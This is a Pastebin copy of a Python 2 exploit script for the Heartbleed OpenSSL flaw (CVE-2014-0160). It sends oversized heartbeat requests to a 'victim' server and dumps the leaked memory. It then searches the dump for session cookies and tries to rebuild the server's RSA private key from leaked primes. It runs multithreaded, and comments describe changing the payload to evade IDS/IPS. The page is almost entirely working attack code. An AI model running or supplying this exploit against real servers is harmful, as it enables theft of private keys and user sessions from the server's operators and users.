Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- '''
- CVE-2014-0160 - Heartbleed OpenSSL Heartbeat vulnerability
- This piece of code is modified from the work of Mothran (https://github.com/mothran/tlslite).
- He releases a testing code for Heartbleed vulnerability at https://github.com/mothran/tlslite/blob/master/scripts/heartbleed.py.
- To run this code, you need to install tlslite from this github and you should use this edition only as other version will not work.
- You also need to install python-m2crypto, python-pycryptopp and python-gmpy.
- Modified by : Samiux
- Blog : http://samiux.blogspot.com
- http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160_17.html
- Date : April 20, 2014
- Version : 0.8
- Change log : 0.1 - First release (April 16, 2014)
- 0.2 - Threading added, Minor improvement and bug fixes (April 16, 2014)
- 0.3 - Minor bug fixes (April 17, 2014)
- 0.4 - Fix calculation of private key bug, Minor improvement (April 17, 2014)
- 0.5 - Fix private key calculation bug, Minor improvement (April 18, 2014)
- 0.6 - Minor improvement (April 18, 2014)
- 0.7 - Bug fix and more improvement (April 18, 2014)
- 0.8 - Add read dump file offline (April 20, 2014)
- Known issue : - The script is for online testing and slow speed is expected. However, it will minimize the loading of the victim
- server.
- - If the number of thread is too high, the victim server will refuse the connection. The limitation is not the power
- of your attacking machine. It is a limitation of the ability of the victim server. In general situation, if the number
- of thread is higher than 40, the victim server will refuse the connection.
- - When the script quit unexpectly (with error messages) with the first try on the unknown server, the server may not support
- SSL or not vulnerable to this bug.
- Unknown factor : Since I have no time to test the Private Key recap function (or say I cannot capture the private key in my personal lab),
- I am not sure if it is working or not. Anyone can inform me the result is appreciated. I can be reached
- at http://www.infosec-ninjas.com/contact.
- May be Apache with vulnerable OpenSSL will not leak SSL Private key. However, Cloudflare (Ngnix with OpenSSL) will.
- Personal Lab : Victim - Ubuntu Server 12.04.4 LTS x88 (without (auto) update/upgrade), LAMP on Virtualbox with 96MB RAM in vm
- Attacker - Kali Linux 1.0.6 x86_64 on MacBook Air (Mid 2013) dual boot
- I follow this link (https://www.digitalocean.com/community/articles/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-12-04)
- to setup SSL key on Apache.
- '''
- # standard library
- import socket, sys, time, re
- import os.path
- # threading and Queue library
- import threading
- # base64 and gmpy library
- import base64, gmpy
- # pyasn1 library
- from pyasn1.codec.der import encoder
- from pyasn1.type.univ import *
- # optparse library
- from optparse import OptionParser
- # tlslite library
- from tlslite.api import *
- from tlslite.messages import *
- from tlslite import __version__
- # Menu and options
- options = OptionParser(usage='time python %prog server [options]', description='Test for OpenSSL heartbeat vulnerability (CVE-2014-0160)')
- options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
- options.add_option('-d', '--dump', type='int', default=1, help='Number of dump per request, standard is 16K per dump (default: 1)')
- options.add_option('-k', '--key', action='store_true', default=False, help="Attempt to obtain the server's SSL Private key")
- options.add_option('-r', '--request', type='int', default=1, help='Number of requests (default: 1)')
- options.add_option('-c', '--cookie', type='str', default='', help="Cookie or session to look for (default: NULL, e.g. -c 'Cookie:')")
- options.add_option('-w', '--write', action='store_true', default=False, help='Write data to be dumped to file (default: False) (write to ~/dumpwrite.bin)')
- options.add_option('-a', '--append', action='store_true', default=False, help='Append data to be dumped to file (default: False) (append to ~/dumpappend.bin)')
- options.add_option('-n', '--name', type='str', default="", help='Server name extension, e.g. -n "/page/index.php" (default: NULL)')
- options.add_option('-t', '--thread', type='int', default=1, help='Number of threads for the requests (default: 1, best range 1-40)')
- options.add_option('-q', '--quiet', action='store_true', default=False, help='Do not display the output on screen (default: False)')
- options.add_option('-o', '--offline', action='store_true', default=False, help='Read the dump file offline (default: False)')
- opts, args = options.parse_args()
- if len(args) < 1 or len(sys.argv[1]) == 0:
- options.print_help()
- sys.exit()
- # for server and port
- port = opts.port
- address = (sys.argv[1], int(port))
- # args assignment
- servername = opts.name
- numb = opts.dump
- num_loop = opts.request
- num_thread = opts.thread
- find_priv_key = opts.key
- find_base = opts.write
- find_append = opts.append
- cookie_val = opts.cookie
- if opts.cookie == "":
- find_cookie = False
- else:
- find_cookie = True
- # read the dump file offline
- def read_offline():
- # option -c (--cookie)
- if find_cookie:
- resp = ""
- if os.path.exists( "dumpwrite.bin" ):
- infile = "dumpwrite.bin"
- elif os.path.exists( "dumpappend.bin" ):
- infile = "dumpappend.bin"
- elif os.path.exists( "dumpwrite.bin" ) and os.path.exists( "dumpappend.bin" ):
- infile = "dumpappend.bin"
- else:
- print("Dump file not exists, quit!")
- sys.exit(-1)
- print("Processing .....")
- print("Result will be saved to ~/dumpsave.txt")
- filesize = os.path.getsize( infile )
- filesize = filesize / 16384
- with open( infile, "r+b" ) as fd:
- resp = fd.read(16384)
- with open( "dumpsave.txt", "a" ) as f:
- while resp:
- # This is dirt and needs to be cleaned up.
- cookies = [m.start() for m in re.finditer(cookie_val, resp)]
- for start in cookies:
- stop = resp[start:].find("\n")
- #if opts.quiet == False:
- # print resp[start: stop]
- data = resp[start: stop]+"\n"
- f.write(data)
- resp = fd.read(16384)
- f.close()
- fd.close()
- # option -k (--key)
- if find_priv_key:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(5)
- sock.connect(address)
- connection = TLSConnection(sock)
- settings = HandshakeSettings()
- settings.heart_beat = True
- try:
- start = time.clock()
- connection.handshakeClientCert(None, None, settings=settings, serverName=servername)
- stop = time.clock()
- except TLSLocalAlert as a:
- if a.description == AlertDescription.user_canceled:
- print(str(a))
- else:
- raise
- sys.exit(-1)
- except TLSRemoteAlert as a:
- if a.description == AlertDescription.unknown_psk_identity:
- if username:
- print("Unknown username")
- else:
- raise
- elif a.description == AlertDescription.bad_record_mac:
- if username:
- print("Bad username or password")
- else:
- raise
- elif a.description == AlertDescription.handshake_failure:
- print("Unable to negotiate mutually acceptable parameters")
- else:
- raise
- sys.exit(-1)
- if connection.session.serverCertChain:
- pubkey = connection.session.serverCertChain.x509List[0].publicKey
- if opts.quiet == False:
- print("n = %s, e = %s" % (pubkey.n, pubkey.e))
- n = pubkey.n
- e = pubkey.e
- num_pubkey_bits = numBits(pubkey.n)
- if opts.quiet == False:
- print("pubkey_bits = %i" % num_pubkey_bits)
- prime_len_bytes = (num_pubkey_bits + 15) // 16
- if opts.quiet == False:
- print("Public key obtained.")
- else:
- print("We don't have a public key to factor, bailing.")
- sys.exit(-1)
- connection.close()
- resp = ""
- if os.path.exists( "dumpwrite.bin" ):
- infile = "dumpwrite.bin"
- elif os.path.exists( "dumpappend.bin" ):
- infile = "dumpappend.bin"
- elif os.path.exists( "dumpwrite.bin" ) and os.path.exists( "dumpappend.bin" ):
- infile = "dumpappend.bin"
- else:
- print("Dump file not exists, quit!")
- sys.exit(-1)
- print("Processing .....")
- filesize = os.path.getsize( infile )
- filesize = filesize / 16384
- with open( infile, "r+b" ) as fd:
- resp = fd.read(16384)
- resp = bytearray(resp)
- counter=1
- while resp:
- print("Processing %d of %d (trunk of 16384 bytes) ..." % (counter, filesize))
- for i in range(0, len(resp)-prime_len_bytes):
- # reverse the bytes, only works for little-endian
- # targets (FIXME? Probably not worth it, would have
- # to guess word length on big-endian.)
- data = resp[i+prime_len_bytes:i:-1]
- data = bytesToNumber(data)
- #if data > 1 and pubkey != None:
- if data > 1 and pubkey != None and (pubkey.n % data) == 0:
- print("Success! p = %i, q = %i" % (data, pubkey.n//data))
- # calculation
- p = data
- q = pubkey.n//data
- #e = 65537
- #q = n / p
- phi = (p - 1) * (q - 1)
- d = gmpy.invert (e, phi)
- dp = d % (p - 1)
- dq = d % (q - 1)
- qinv = gmpy.invert (q, p)
- seq = Sequence()
- # build SSL private key
- for x in [0, n, e, d, p, q, dp, dq, qinv]:
- seq.setComponentByPosition (len (seq), Integer (x))
- priv_key = ("\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq)))
- # print the private key to screen
- print priv_key
- # save the private key
- fd = open( "private_key.pem", "w")
- fd.write(priv_key)
- fd.flush()
- fd.close()
- resp = fd.read(16384)
- resp = bytearray(resp)
- counter=counter+1
- fd.close()
- print("Private key not found :(")
- # Main loop
- def main_loop(z):
- for x in range(0, num_loop):
- # check for key found flag
- if os.path.exists("/tmp/key_found"):
- print("Private key has been found, no more process!")
- connection.close()
- sys.exit(0)
- if num_thread > 1:
- print ("Thread : %i of %i, Request : %i of %i" %(z, num_thread, x, num_loop))
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(5)
- sock.connect(address)
- connection = TLSConnection(sock)
- settings = HandshakeSettings()
- settings.heart_beat = True
- try:
- start = time.clock()
- connection.handshakeClientCert(None, None, settings=settings, serverName=servername)
- stop = time.clock()
- except TLSLocalAlert as a:
- if a.description == AlertDescription.user_canceled:
- print(str(a))
- else:
- raise
- sys.exit(-1)
- except TLSRemoteAlert as a:
- if a.description == AlertDescription.unknown_psk_identity:
- if username:
- print("Unknown username")
- else:
- raise
- elif a.description == AlertDescription.bad_record_mac:
- if username:
- print("Bad username or password")
- else:
- raise
- elif a.description == AlertDescription.handshake_failure:
- print("Unable to negotiate mutually acceptable parameters")
- else:
- raise
- sys.exit(-1)
- # --key (-k) is true
- if find_priv_key:
- if connection.session.serverCertChain:
- pubkey = connection.session.serverCertChain.x509List[0].publicKey
- if opts.quiet == False:
- print("n = %s, e = %s" % (pubkey.n, pubkey.e))
- n = pubkey.n
- e = pubkey.e
- num_pubkey_bits = numBits(pubkey.n)
- if opts.quiet == False:
- print("pubkey_bits = %i" % num_pubkey_bits)
- prime_len_bytes = (num_pubkey_bits + 15) // 16
- if opts.quiet == False:
- print("Public key obtained.")
- else:
- print("We don't have a public key to factor, bailing.")
- sys.exit(-1)
- # printGoodConnection(connection, stop-start)
- # change the value of paylaod to prevent the IDS/IPS
- heartbeat = HeartBeat()
- heartbeat.create(type=1,
- pay_len=0xffff,
- payload="AA")
- # up the range numbs to get more memory, sometimes it repeats.
- resp = ""
- for x in range(0, numb):
- for result in connection._sendMsg(heartbeat):
- pass
- resp = resp + connection.readPOC(0xffff)
- # option -w (--write)
- if find_base:
- fd = open( "dumpwrite.bin", "w+b")
- fd.write(resp)
- fd.flush()
- fd.close()
- # option -a (--append)
- if find_append:
- fd = open( "dumpappend.bin", "a+b")
- fd.write(resp)
- fd.flush()
- fd.close()
- # option -k (--key) <--- this feature is not well tested, please let me know the result.
- if find_priv_key:
- resp = bytearray(resp)
- for i in range(0, len(resp)-prime_len_bytes):
- # reverse the bytes, only works for little-endian
- # targets (FIXME? Probably not worth it, would have
- # to guess word length on big-endian.)
- data = resp[i+prime_len_bytes:i:-1]
- data = bytesToNumber(data)
- #if data > 1 and pubkey != None:
- if data > 1 and pubkey != None and (pubkey.n % data) == 0:
- print("Success! Thread = %i, p = %i, q = %i" % (z, data, pubkey.n//data))
- # save the dump
- fd = open( "dumpfinal.bin", "w+b" )
- fd.write(resp)
- fd.flush()
- fd.close()
- # calculation
- p = data
- q = pubkey.n//data
- #e = 65537
- #q = n / p
- phi = (p - 1) * (q - 1)
- d = gmpy.invert (e, phi)
- dp = d % (p - 1)
- dq = d % (q - 1)
- qinv = gmpy.invert (q, p)
- seq = Sequence()
- # build SSL private key
- for x in [0, n, e, d, p, q, dp, dq, qinv]:
- seq.setComponentByPosition (len (seq), Integer (x))
- priv_key = ("\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq)))
- # print the private key to screen
- print priv_key
- # save the private key
- fd = open( "private_key.pem", "w")
- fd.write(priv_key)
- fd.flush()
- fd.close()
- # set the key found flag
- key_found = "Private key is found!"
- fd = open( "/tmp/key_found", "w")
- fd.write(key_found)
- fd.flush()
- fd.close()
- connection.close()
- sys.exit(0)
- # option -c (--cookie)
- if find_cookie:
- # This is dirt and needs to be cleaned up.
- cookies = [m.start() for m in re.finditer(cookie_val, resp)]
- for start in cookies:
- stop = resp[start:].find("\n")
- print resp[start: stop]
- # to print the dump on screen or not
- if opts.quiet == False:
- if opts.write == False and opts.append == False:
- if opts.key == False:
- if find_cookie == False:
- print resp
- # pause for 0.1 seconds in order to reduce the chance of dulplicate the content of the memory dump
- if opts.request > 1:
- time.sleep(.1)
- # close the connection
- connection.close()
- if __name__ == '__main__':
- # reset the key found flag
- if os.path.exists("/tmp/key_found"):
- os.remove("/tmp/key_found")
- if opts.offline == True:
- read_offline()
- else:
- # multi-threading or not
- if num_thread > 1:
- thread_list = []
- for i in range(num_thread):
- t = threading.Thread(target=main_loop, args=(i,))
- thread_list.append(t)
- for thread in thread_list:
- thread.start()
- for thread in thread_list:
- thread.join()
- else:
- main_loop(1)
Add Comment
Please, Sign In to add comment